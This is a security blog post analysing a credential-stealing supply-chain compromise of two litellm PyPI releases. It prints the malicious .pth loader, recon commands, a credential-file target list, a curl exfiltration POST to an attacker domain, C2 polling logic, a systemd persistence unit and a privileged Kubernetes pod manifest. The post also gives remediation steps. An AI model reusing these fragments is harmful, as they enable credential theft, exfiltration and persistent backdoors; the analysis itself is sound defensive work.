litellm: Credential Stealer Hidden in PyPI Wheel

On March 24, 2026, a critical supply chain compromise was identified across two litellm releases on PyPI. The issue was disclosed in BerriAI/litellm#24512.

Sai Likhith

March 24, 2026

On March 24, 2026, a critical supply chain compromise was identified across two litellm releases on PyPI. The issue was disclosed in BerriAI/litellm#24512.

We independently performed static analysis on both versions, fully decoding the payloads. What we found is a sophisticated, three-stage attack: mass credential harvesting, AES-256+RSA-4096 encrypted exfiltration to an attacker-controlled domain, and a persistent C2 backdoor capable of laterally compromising every node in a Kubernetes cluster. Both versions carry the identical payload and exfiltrate to the same attacker infrastructure — the only difference is the injection mechanism.

If you installed litellm 1.82.7 or 1.82.8: Rotate all secrets immediately — every environment variable, SSH key, cloud credential, and API key present on that system. See the Remediation section below.

Key finding: Two versions are confirmed compromised, each using a different injection technique. litellm==1.82.8 contains a malicious litellm_init.pth file (34,628 bytes) registered in the package’s own RECORD with a valid SHA-256 hash. litellm==1.82.7 embeds the identical credential-stealing payload as a base64 blob directly inside litellm/proxy/proxy_server.py, with no .pth file. Both point to the same attacker RSA public key and the same exfiltration endpoint. This is a publishing credential or CI/CD pipeline compromise spanning at least two releases.

Background: What Is litellm?

LiteLLM is a widely-used Python library that provides a unified API interface for over 100 LLM providers (OpenAI, Anthropic, Bedrock, Vertex AI, etc.). It is a dependency in a large number of AI application stacks, CI/CD pipelines, and production inference services. A developer or engineer installing litellm for routine work would have no reason to suspect the package is exfiltrating credentials.

The issue quickly attracted 196+ comments, the majority of which are generic bot spam — “Thanks, that helped!”, “Worked like a charm”, “This was the answer I was looking for” — identical noise suppression seen in the second Trivy compromise. This is a deliberate tactic: flooding the issue with off-topic chatter to obscure the severity and make casual readers assume the problem has been handled.

Possible Initial Access Vector: Trivy in CI/CD

A review of the litellm repository points to a possible initial access vector. LiteLLM’s ci_cd/security_scans.sh shows Trivy was used directly in their CI/CD security scan workflow. The threat group TeamPCP had previously compromised Trivy; it is possible they used that foothold to pivot into litellm’s pipeline and inject the malicious payload into the published PyPI releases.

litellm ci_cd/security_scans.sh showing Trivy dependency

The Entry Points: Two Versions, Two Injection Techniques

1.82.8 — Malicious .pth File

The attack exploits a legitimate but little-known Python feature. Any .pth file placed in a site-packages/ directory is processed by Python’s site module on every interpreter startup. Lines starting with import are executed directly. This means any code in a .pth file runs before any application code and with no user interaction.

The malicious file, litellm_init.pth, is listed in the package’s own RECORD:

litellm_init.pth,sha256=ceNa7wMJnNHy1kRnNCcwJaFjWX3pORLfMh7xGL8TUjg,34628

Its contents are a single line that spawns a detached subprocess to avoid blocking the Python session:

import os, subprocess, sys; subprocess.Popen([sys.executable, "-c",
    "import base64; exec(base64.b64decode('aW1wb3J0IHN1YnByb2Nlc3MK...'))"])

Why this is stealthy: Because .pth execution is a Python interpreter feature — not a setup.py hook or postinstall script — many security scanners and package auditing tools do not flag it. The 34 KB payload is also stored as a single opaque base64 blob, invisible without decoding.

1.82.7 — Payload Embedded in proxy_server.py

litellm==1.82.7 does not contain a .pth file. Instead, the identical credential-stealing payload is embedded as a base64 blob directly inside litellm/proxy/proxy_server.py, injected at the module’s top-level import block:

import subprocess, base64, sys, tempfile, os

b64_payload = "aW1wb3J0IHN1YnByb2Nlc3MKaW1wb3J0IHRlbXBmaWxl..."

The payload decodes to the same credential harvester — same RSA-4096 public key, same AES-256-CBC encryption, same curl POST to https://models.litellm.cloud/. Because it is embedded in the proxy server module rather than a .pth file, it executes when the litellm proxy is imported or started rather than on every Python startup. Users who ran litellm --server or imported the proxy module while on 1.82.7 were affected.

Same attacker, same infrastructure: The RSA public key embedded in both versions is byte-for-byte identical, and both exfiltrate to https://models.litellm.cloud/. The two releases represent a staged campaign — 1.82.7 used a more targeted trigger (proxy startup), while 1.82.8 escalated to a .pth-based approach that fires on every Python interpreter launch regardless of whether the proxy is used.

‍

Stage 1: Mass Credential Harvester

After two base64 decode steps, the first-stage payload is a pure-Python credential collection script. It runs in the background for as long as it takes, then encrypts and exfiltrates everything it finds.

System Reconnaissance

It begins with basic system fingerprinting, writing results to a temp file:

run('hostname; pwd; whoami; uname -a; ip addr 2>/dev/null || ifconfig 2>/dev/null; ip route 2>/dev/null')
run('printenv')

The run() helper calls subprocess.check_output(cmd, shell=True, stderr=DEVNULL, timeout=10) and silently swallows all errors — ensuring no traceback or visible output reaches the user.

Credential Targets

The harvester then systematically reads every credential file it can reach. The targets span the full range of cloud, developer, and infrastructure secrets:

SSH Keys: ~/.ssh/id_rsa, id_ed25519, id_ecdsa, authorized_keys, known_hosts, config; host keys from /etc/ssh/ssh_host_*_key
Git Credentials: ~/.git-credentials, ~/.gitconfig
AWS: ~/.aws/credentials, ~/.aws/config; IMDS token + IAM role credentials via 169.254.169.254; live signed API calls to AWS Secrets Manager (ListSecrets + GetSecretValue) and SSM Parameter Store (DescribeParameters)
Kubernetes: ~/.kube/config, /etc/kubernetes/admin.conf, service account tokens at /var/run/secrets/kubernetes.io/serviceaccount/token; live API calls to enumerate secrets across all namespaces
GCP: ~/.config/gcloud/application_default_credentials.json, $GOOGLE_APPLICATION_CREDENTIALS
Azure: ~/.azure/ (full recursive walk)
Docker: ~/.docker/config.json, /kaniko/.docker/config.json, /root/.docker/config.json
Env Files: .env, .env.local, .env.production, /etc/environment; recursive walk depth 6 across /home, /opt, /app, /data, /var/www
Package Manager / Tokens: ~/.npmrc, ~/.vault-token, ~/.netrc, ~/.pgpass, ~/.mongorc.js, ~/.my.cnf, ~/.msmtprc
Shell History: ~/.bash_history, ~/.zsh_history, ~/.mysql_history, ~/.psql_history, ~/.rediscli_history
TLS / PKI: /etc/ssl/private/*.key, Let’s Encrypt .pem files; recursive walk for .pem, .key, .p12, .pfx
CI/CD Configs: terraform.tfvars, terraform.tfstate, .gitlab-ci.yml, .travis.yml, Jenkinsfile, .drone.yml, ansible.cfg
Crypto Wallets: Bitcoin, Litecoin, Dogecoin, Ethereum keystore, Solana keypairs (validator-keypair.json, identity.json, etc.), Cardano .skey/.vkey files
System: /etc/passwd, /etc/shadow, SSH auth logs (/var/log/auth.log, /var/log/secure)

AWS credentials are not just read from disk — the harvester implements a full AWS Signature V4 signing loop in pure Python and makes live API calls to AWS Secrets Manager and SSM Parameter Store with any credentials it finds, exfiltrating the values of all the stored secrets:

sm = aws_req('POST', 'secretsmanager', REG, '/', 'Action=ListSecrets',
    {'X-Amz-Target': 'secretsmanager.ListSecrets'}, AK, SK, ST)
# then GetSecretValue for each secret in the list

Similarly, if a Kubernetes service account token is present, it makes live API calls to enumerate and read secrets across all namespaces:

secrets = k8s_get('/api/v1/secrets')
for ns_item in ns_data.get('items', []):
    ns = ns_item['metadata']['name']
    ns_secrets = k8s_get(f'/api/v1/namespaces/{ns}/secrets')

Encryption and Exfiltration

All collected data is written to a temp file, then encrypted before transmission — making the exfiltrated archive unreadable without the attacker’s private key:

A random 32-byte AES session key is generated: openssl rand -out session.key 32
The collected data is encrypted: openssl enc -aes-256-cbc -in collected -out payload.enc -pass file:session.key -pbkdf2
The session key is RSA-encrypted with a hardcoded 4096-bit public key: openssl pkeyutl -encrypt -pubin -inkey pub.pem -pkeyopt rsa_padding_mode:oaep
Both files are packed as tpcp.tar.gz and POSTed to the C2:

curl -s -X POST "https://models.litellm.cloud/" \
  -H "Content-Type: application/octet-stream" \
  -H "X-Filename: tpcp.tar.gz" \
  --data-binary @tpcp.tar.gz

The exfiltration endpoint is models.litellm.cloud — a domain that deliberately mimics the legitimate litellm.ai. The RSA public key embedded in the payload begins:

-----BEGIN PUBLIC KEY-----
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAvahaZDo8mucujrT15ry+
08qNLwm3kxzFSMj84M16lmIEeQA8u1X8DGK0EmNg7m3J6C3KzFeIzvz0UTgSq6cV
...

The use of hybrid encryption (AES session key + RSA-4096 envelope) means only the attacker, in possession of the corresponding private key, can decrypt what was stolen.

Stage 2: Persistent C2 Backdoor

In parallel, the stage-1 script drops a persistence implant — sysmon.py — to ~/.config/sysmon/sysmon.py and registers it as a systemd user service:

[Unit]
Description=System Telemetry Service
After=network.target

[Service]
Type=simple
ExecStart=/usr/bin/python3 /home/user/.config/sysmon/sysmon.py
Restart=always
RestartSec=10
StandardOutput=null
StandardError=null

[Install]
WantedBy=multi-user.target

No root is required. The service persists across reboots, restarts on failure, and produces no visible output. The name “System Telemetry Service” is chosen to look innocuous in a systemctl list-units listing.

The implant polls a C2 controller at https://checkmarx.zone/raw — a domain that impersonates the legitimate Checkmarx security brand. The polling loop:

C_URL = "https://checkmarx.zone/raw"
TARGET = "/tmp/pglog"
STATE = "/tmp/.pg_state"

# Polls every ~50 minutes
# Fetches a URL from C_URL
# Downloads binary to /tmp/pglog, chmod 0o755, executes detached
# Tracks last-downloaded URL in /tmp/.pg_state to avoid re-runs

The C2 endpoint serves an arbitrary URL. The implant downloads whatever binary is at that URL, makes it executable, and runs it as a detached process. This provides the attacker with a persistent, updateable remote code execution channel on every affected machine.

Stage 3: Kubernetes Lateral Movement

If stage 1 finds a Kubernetes service account token, it does not just read secrets — it deploys a privileged pod to every node in the cluster. The pod manifest:

{
  "kind": "Pod",
  "metadata": {"name": "node-setup-<node-name>", "namespace": "kube-system"},
  "spec": {
    "nodeName": "<node>",
    "hostPID": true,
    "hostNetwork": true,
    "tolerations": [{"operator": "Exists"}],   // schedules on ALL nodes, including tainted
    "containers": [{
      "image": "alpine:latest",
      "securityContext": {"privileged": true},
      "volumeMounts": [{"name": "host", "mountPath": "/host"}]
    }],
    "volumes": [{"hostPath": {"path": "/"}}]   // mounts the host filesystem
  }
}

The container runs as privileged with hostPID, hostNetwork, and the host root filesystem mounted at /host. Its command writes sysmon.py to /host/root/.config/sysmon/sysmon.py on the node, then registers and starts it as a systemd service via chroot /host systemctl. This effectively installs the C2 backdoor on the host node OS, not just in the container.

With tolerations: [{operator: Exists}], the pod will be scheduled on every node in the cluster, including those with NoSchedule or NoExecute taints. A single compromised workload in a cluster can silently backdoor every node.

Impact in K8s environments: Even if the infected Python process runs in a short-lived container, the moment it finds a service account token with pod-create permissions in kube-system, the attack escapes the container and persists on the bare-metal or VM nodes beneath it. Cleaning up the container is insufficient.

Controlled Execution Analysis

To validate our static analysis findings, StepSecurity ran the malicious package in a controlled GitHub Actions environment with Harden Runner enabled in audit mode. The execution confirmed every stage of the attack chain — and revealed why the malware behaves unusually on standard GitHub-hosted runners.

What Harden Runner Captured

Within seconds of import litellm, Harden Runner recorded two notable outbound events in the "Verify LiteLLM import and version" step:

169.254.169.254:80 — the cloud instance metadata service (IMDS). Harden Runner flagged this as anomalous. This is the malware's AWS credential live-harvest path: it queries IMDS to obtain an instance role's temporary credentials, then uses those credentials — signed with AWS Signature V4 — to call ListSecrets on Secrets Manager and enumerate SSM Parameter Store values across every AWS region. The request was initiated by a curl child process spawned by the Python payload.

models.litellm.cloud:443 — the exfiltration endpoint identified in our static analysis. The harvester encrypted collected credentials with AES-256+RSA-4096 and attempted to POST them as tpcp.tar.gz to this domain. This was the first network event after the package was imported, confirming the payload fires immediately on Python startup.

Harden Runner anomalous activity detail — 169.254.169.254:80 flagged during "Verify LiteLLM import and version" step

Why the Malware Gets Stuck on GitHub Runners

On standard GitHub-hosted runners (2-core, 7 GB RAM) the malware causes severe CPU exhaustion and the job eventually times out. This is not a coincidence — it is the direct result of how the payload is architected:

The .pth mechanism fires on every Python process, including subprocesses it spawns itself. Python's site module executes litellm_init.pth on every interpreter startup. When the credential harvester spawns a detached subprocess (which also uses Python), that subprocess triggers litellm_init.pth again. This creates a recursive fork where each generation of the payload spawns the next. In a single GitHub Actions step that invokes pip, python -c, or any other Python command multiple times, the process tree grows rapidly.

Process tree from Harden Runner showing recursive Python subprocess spawning during payload execution

AWS IMDS timeout loops. The harvester iterates through AWS regions attempting to reach the metadata service at 169.254.169.254. In ARC (Actions Runner Controller) environments and self-hosted runners that do not have IMDS configured, each connection attempt blocks for the full TCP timeout before moving on. Multiplied across regions and services (Secrets Manager, SSM, EC2 metadata), the payload can block for several minutes on network I/O alone.

Recursive filesystem traversal. The harvester walks /home, /opt, /app, /data, and /var/www to a depth of 6, collecting every .env file it finds. On a GitHub Actions runner with a large Python environment installed (litellm brings hundreds of transitive dependencies), this traversal touches a significant number of inodes and dominates CPU time.

RSA-4096 encryption under load. After collection, all harvested data is encrypted with AES-256-CBC and the session key is wrapped with a 4096-bit RSA public key. On a shared 2-core runner already under load from the process tree explosion, this operation can spike CPU to 100% for extended periods.

The net result: on a small GitHub-hosted runner, the job appears to hang. The step running import litellm never exits cleanly. On a larger machine — as observed in our partial execution run — the payload progresses further through the harvest and exfiltration stages before the runner resource limits are hit.

GitHub Actions job timeline showing extended step duration and eventual failure during "Verify LiteLLM import and version"

Downstream Impact

LiteLLM is a transitive dependency in a large number of AI frameworks and tools. Because most projects pin litellm>=<some-version> with no upper bound, users of these projects may have pulled 1.82.7 or 1.82.8 without ever directly depending on litellm. The following high-profile projects opened issues on March 24, 2026 confirming exposure or broken CI due to the quarantine.

Microsoft GraphRAG (microsoft/graphrag#2289) — GraphRAG depends on litellm and flagged the supply chain compromise affecting its users.

Google ADK Python (google/adk-python#4981) — google-adk[eval] is broken because litellm has been quarantined on PyPI. No workaround exists short of removing the eval extra entirely.

DSPy (stanfordnlp/dspy#9499) — DSPy depends on litellm, which is quarantined on PyPI. All fresh installs are currently blocked.

OpenHands (OpenHands/OpenHands#13567) — All OpenHands CI jobs are failing because litellm is quarantined. The issue confirms that versions 1.82.7 and 1.82.8 steal SSH keys, environment variables, and API keys.

browser-use (browser-use/browser-use#4505) — The browser-use CLI installs litellm>=1.82.2 which pulled the malicious 1.82.8. The issue describes the full three-stage payload including the persistent backdoor polling checkmarx.zone.

crawl4ai (unclecode/crawl4ai#1864) — The published PyPI release of crawl4ai (v0.8.5) specifies litellm>=1.53.1 with no upper bound. A fix exists on the develop branch but has not been released.

ii-agent (Intelligent-Internet/ii-agent#186) — ii-agent’s pyproject.toml pins litellm>=1.63.14 with no upper bound, potentially pulling compromised versions. Recommends pinning <1.82.7.

BeeAI Framework (i-am-bee/beeai-framework#1413) — BeeAI Framework does not enforce a vetted litellm version; users installing it were exposed to the compromise.

If you use any of the above frameworks: Check whether your installed environment pulled litellm 1.82.7 or 1.82.8 as a transitive dependency. Run pip show litellm to confirm the installed version and treat any system where these versions were present as fully compromised.

The Comment Spam Campaign

The GitHub issue received 196+ comments within hours, the vast majority of which are off-topic generic responses from accounts with no prior contribution history:

“Thanks, that helped!” · “Worked like a charm, much appreciated.” · “This was the answer I was looking for.” · “Great explanation, thanks for sharing.” · “Exactly what I needed, thanks.”

This is the same noise-injection tactic observed in the Trivy second compromise. By flooding the issue with low-signal comments, attackers make it harder for maintainers and users scanning the issue to assess actual severity, and create a false impression that affected users have found workarounds and moved on.

Attack Flow Summary

T+0 — pip install litellm==1.82.8 litellm_init.pth is written to site-packages/. No code runs yet.

T+next Python startup Python’s site module executes the .pth file. A detached subprocess spawns. Victim’s Python process continues normally — no errors, no visible output.

T + seconds to minutes Stage-1 credential harvester runs: collects SSH keys, cloud credentials, env vars, K8s secrets, shell history, crypto wallets. Encrypts with AES-256/RSA-4096. POSTs tpcp.tar.gz to https://models.litellm.cloud/.

T + seconds (concurrent) If Kubernetes service account token found: deploys privileged pods to all cluster nodes, installs backdoor on host OS.

T + persistent sysmon.py dropped to ~/.config/sysmon/, systemd user service installed. Polls https://checkmarx.zone/raw every ~50 minutes for arbitrary second-stage binaries.

Remediation

Immediate actions if litellm 1.82.7 or 1.82.8 was installed on any system:

Check for the malicious .pth file: find /usr/lib/python3 ~/.local/lib /opt -name "litellm_init.pth" 2>/dev/null
‍
Any result confirms the compromised package was installed.
Check for the persistence backdoor:
‍
‍ls ~/.config/sysmon/sysmon.py ls ~/.config/systemd/user/sysmon.service systemctl --user status sysmon.service
‍
If these exist, the malware ran and the backdoor is active. Stop and disable the service before remediation.
Check for K8s lateral movement (if on a Kubernetes cluster):
kubectl get pods -n kube-system | grep node-setup
‍
Delete any matching pods immediately. Check all nodes for ~root/.config/sysmon/sysmon.py.
Rotate all credentials that were accessible on the affected system:
- AWS access keys and session tokens — including all IAM roles attached to the instance
- Kubernetes service account tokens and kubeconfig certificates
- SSH private keys — and remove the public keys from authorized_keys on remote systems
- GCP service account keys, Azure credentials
- All .env file values: API keys, database URLs, webhook tokens
- Docker Hub / container registry tokens
- npm, PyPI, and other package registry token
Rotate AWS Secrets Manager and SSM secrets regardless of whether you see evidence of exfiltration — the harvester calls the APIs live and retrieves values directly.
Audit network logs for outbound connections to models.litellm.cloud and checkmarx.zone. These connections confirm exfiltration and/or C2 activity.
Upgrade litellm to a version confirmed clean and check for litellm_init.pth absence before re-installing.‍
‍
CI/CD pipelines: If litellm 1.82.7 or 1.82.8 was installed in any CI/CD workflow, assume every secret in that workflow’s environment was exfiltrated — NPM_TOKEN, PYPI_TOKEN, AWS_SECRET_ACCESS_KEY, GitHub PATs, everything. Rotate all secrets injected into those pipelines.

How StepSecurity Helps

Harden-Runner monitors every outbound network connection made during a GitHub Actions workflow. Organizations running Harden-Runner with allowed-endpoint policies would have had the connection to models.litellm.cloud blocked before exfiltration occurred, and received an alert flagging the anomalous outbound request.

StepSecurity Enterprise customers can visit the Threat Center for the full alert on this incident, including the complete IOC set, affected version details, and remediation steps.

Threat Center delivers real-time alerts about compromised packages, hijacked maintainers, and emerging attack campaigns directly into existing SIEM workflows. Alerts include attack summaries, technical analysis, IOCs, affected versions, and remediation steps.